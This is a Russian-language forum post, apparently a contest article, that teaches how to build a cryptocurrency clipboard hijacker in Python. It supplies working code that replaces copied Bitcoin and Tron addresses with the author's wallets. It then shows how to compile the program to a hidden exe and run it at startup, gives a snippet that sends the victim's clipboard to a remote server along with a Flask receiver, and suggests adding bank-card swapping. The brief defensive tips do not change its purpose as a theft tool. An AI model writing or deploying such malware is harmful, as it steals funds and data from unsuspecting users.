- Сообщения
- 242
- Реакции
- 1.178
- Продажи
- 14
- Кешбек
- 24.58$
Здравствуйте! Первый раз пишу статью на подобные конкурсы, так что не обессудьте)
Я расскажу о том, как сделать клиппер различных криптовалют на лучшем из языков программирования. Конкретно на python. Распишу код с комментариями и вы сможете сделать подобное самостоятельно.
Буду писать и проверять под систему Windows,однако код должен работать на любых системах. Используются платформенно-независимые библиотеки.
Сначала о том, что такое Клиппер. Это самый простейший из вредных программ. Он постоянно мониторит буфер обмена системы. Как только видит подходящий по паттерну кошелек или карту подменяет реквизиты на ваши. На этом все. Более умные клипперы могут подменять адреса, на специально сгенерированные кошельки. С похожим началом строки, чтобы пользователь после проверки ничего не заметил.
Также для общего развития еще пример вредоносных программ.
1. Вирусы: Вирусы — это вредоносные программы, которые могут внедряться в файлы вашей операционной системы и распространяться на другие файлы. Они могут причинить различные виды вреда, включая удаление файлов, сбои системы или кражу личных данных.
2. Шпионские программы: Шпионские программы (spyware) следят за вашей активностью в Интернете и собирают информацию о вас без вашего согласия. Они могут записывать ваши нажатия клавиш, перехватывать пароли, собирать личные данные и передавать их злоумышленникам.
3. Рекламное ПО: Рекламное программное обеспечение (adware) отображает назойливую рекламу на вашем компьютере или мобильном устройстве. Оно может открывать всплывающие окна, перенаправлять вас на веб-сайты с рекламой или изменять вашу домашнюю страницу в браузере.
4. Троянские программы: Троянские программы (trojans) маскируются под полезные или необходимые программы, но в действительности выполняют вредоносные функции. Они могут открывать доступ злоумышленникам к вашему компьютеру, украсть данные, установить другие вредоносные программы или причинить другой вид вреда.
5. Рэнсомвары: Рэнсомвары (ransomware) блокируют доступ к вашим файлам или шифруют их, а затем требуют выкуп для их восстановления. Они могут причинить значительный ущерб, если ваши важные данные зашифрованы и вы не можете получить к ним доступ без оплаты.
6. Ботнеты: Ботнеты — это сети зараженных компьютеров, которые злоумышленники используют для выполнения различных задач без вашего согласия. Эти компьютеры могут использоваться для отправки спама, атак на другие компьютеры или сети, или даже для майнинга криптовалюты.
7. Фишинговые программы: Фишинговые программы пытаются маскироваться под доверенные веб-сайты или сервисы, чтобы получить доступ к вашим личным данным, таким как пароли, номера кредитных карт или социальные номера. Они могут использоваться для кражи личных данных или для мошенничества.
Приступайте к разработке. Вам нужен будет python3.7+
Поставьте в систему его с официального сайта. Скачайте и добавьте в path. В установщике будет такая галочка.
Проверьте в терминале, что присутствует команды python и pip для установки библиотек.
Поставьте pyperclip, команда будет pip install pyperclip
Отлично! Следом пробуем писать код.
Импортируйте модули.
Python:
import pyperclip # Импорт библиотеки для работы с буфером обмена
from time import sleep # Импорт библиотеки для остановки программы на время
import reВ текущей версии будем подменять адреса биткоин разных версий и tron кошельков. Нам понадобятся паттерны, то есть шаблоны строки кошелька.
Python:
btc = '3MQTRzttkMtsMEy9dRq4Sf1xiSsWKgQkyH' # Ваш BTC-Адрес
btc_len = [26, 27, 28, 29, 30, 31, 32, 33, 34, 35] # Не трогать
tron_adr = 'TJZJrYsJ4R4UP3G2s8s2kFJUJGxYtft3kq'
tron_pattern = re.compile("T[A-Za-z1-9]{33}")
bc_regex = re.compile('bc(0([ac-hj-np-z02-9]{39}|[ac-hj-np-z02-9]{59})|1[ac-hj-np-z02-9]{8,87})')Этот код проверяет паттерны и определяет ваши кошельки на которые будут отсылаться средства.
Дальше вам нужно в цикле проверять наличие шаблона в буфере обмена. И заменять на необходимое.
Python:
# Бесконечный цикл
while True:
clipboard = pyperclip.paste() # Получаем содержимое буфера обмена
if bc_regex.match(clipboard):
if clipboard != btc:
pyperclip.copy(btc) #Заносим пользователю в буфер btc
elif tron_pattern.match(clipboard):
if clipboard != tron_adr:
pyperclip.copy(tron_adr) #Заносим пользователю в буфер tron
elif len(clipboard) in btc_len and (clipboard[0] == '1' or clipboard[0] == '3'):
# Если содержимое не равно нашему BTC-Адресу, то...
if clipboard != btc:
pyperclip.copy(btc) # Заносим пользователю в буфер свой биткоин-адрес
else:
pass
sleep(1)Обьясню, что тут происходит! Раз в секунду программу проверяет в буфере есть ли строка подходящая под ваш бтс адрес или трон. Если нету. То проверяет ваши шаблоны, если мы совпадаем по шаблонам, то идет подмена адреса в буфер. Пользователь скопировав кошелек для перевода в свою программу получит уже ваш кошель. Если он невнимателен, то атака удалась) Ждите битки, трон,usdt.
Чтобы защитить себя от клипперов и подобных атак, вот несколько рекомендаций:
1. Проверяйте адреса вручную: Вместо того, чтобы полагаться только на скопированный адрес, внимательно проверяйте его перед отправкой транзакции. Сравните адрес, который вы видите на экране, с тем, который был скопирован в буфер обмена.
2. Используйте двухфакторную аутентификацию: Включите двухфакторную аутентификацию для своих криптовалютных кошельков. Это дополнительный уровень защиты, который затрудняет доступ к вашим средствам без подтверждения вашей личности.
3. Обновляйте программное обеспечение: Регулярно обновляйте свои операционные системы, антивирусные программы и кошельки для криптовалюты. Это поможет вам избежать известных уязвимостей и защититься от новых видов вредоносных программ.
4. Будьте осторожны с загрузкой программ: Избегайте загрузки программ с ненадежных и неизвестных источников. Загружайте программное обеспечение только с официальных и проверенных источников.
5. Установите антивирусное программное обеспечение: Используйте надежное антивирусное программное обеспечение, которое может обнаруживать и блокировать вредоносные программы, включая клипперы.
6. Будьте бдительны при переходе по ссылкам: Не переходите по подозрительным ссылкам, особенно в электронных письмах или на ненадежных веб-сайтах. Это может быть попыткой перенаправить вас на фальшивые сайты, где могут быть установлены клипперы.
Вопросы.
Как собрать код вашего клиппера в exe файл?
Python — это язык,который требует наличие интерпретатора в системе. Но не беда! Все таки есть способы собрать в единый исполняющийся архив его и библиотеки. Например с помощью pyinstaller. Установите его в систему pip install pyinstaller и сделайте такую команду. pyinstaller --onefile -w your_script.py
Параметры означают вот что! Сборка в один файл и убираем окно консоли.
Как улучшить программу?
Можно добавить в код, работу с вашими серверами. С которых будут постоянно приходить новые адреса кошельков. Или отсылать дополнительно всю информацию с буфера обмена пользователя в сеть.
Пример.
Python:
import requests
import pyperclip
# Получаем данные из буфера обмена
clipboard_data = pyperclip.paste()
# Создаем словарь с данными для отправки на сервер
data = {
'clipboard': clipboard_data
}
# URL сервера, куда будем отправлять данные
server_url = 'http://example.com/clipboard'
# Отправляем POST-запрос на сервер
response = requests.post(server_url, data=data)
# Проверяем статус ответа
if response.status_code == 200:
print('Данные успешно отправлены на сервер')
else:
print('Ошибка при отправке данных на сервер')
Python:
from flask import Flask, request
app = Flask(__name__)
@app.route('/clipboard', methods=['POST'])
def save_clipboard_data():
clipboard_data = request.form.get('clipboard')
# Сохраняем данные в файл
with open('clipboard_data.txt', 'a') as file:
file.write(clipboard_data + '\n')
return 'Данные успешно сохранены на сервере'
if __name__ == '__main__':
app.run()Данный код уже не клиппер, а просто пример ,который отправляет один раз буфер обмена на ваш сервак с flask сервером. Для общего развития!
Как сделать автозапуск программы?
Вам нужно закинуть программу в папку автозагрузки виндоус или в планировщик задач.
Можно ли добавить карты?
Конечно, погуглите регексп для определенных карт и вы сможете заменять также реквизиты карт. Только это менее безопасно, карты должны быть левые.
Домашнее задание)
Попробуйте проверить, скомпилировать программу и добавить в нее замену ltc-адресов. С разными типами.
Сообщение обновлено:
Отступы съехали в коде , скинул основной код файлом. Только смените расширение на .py
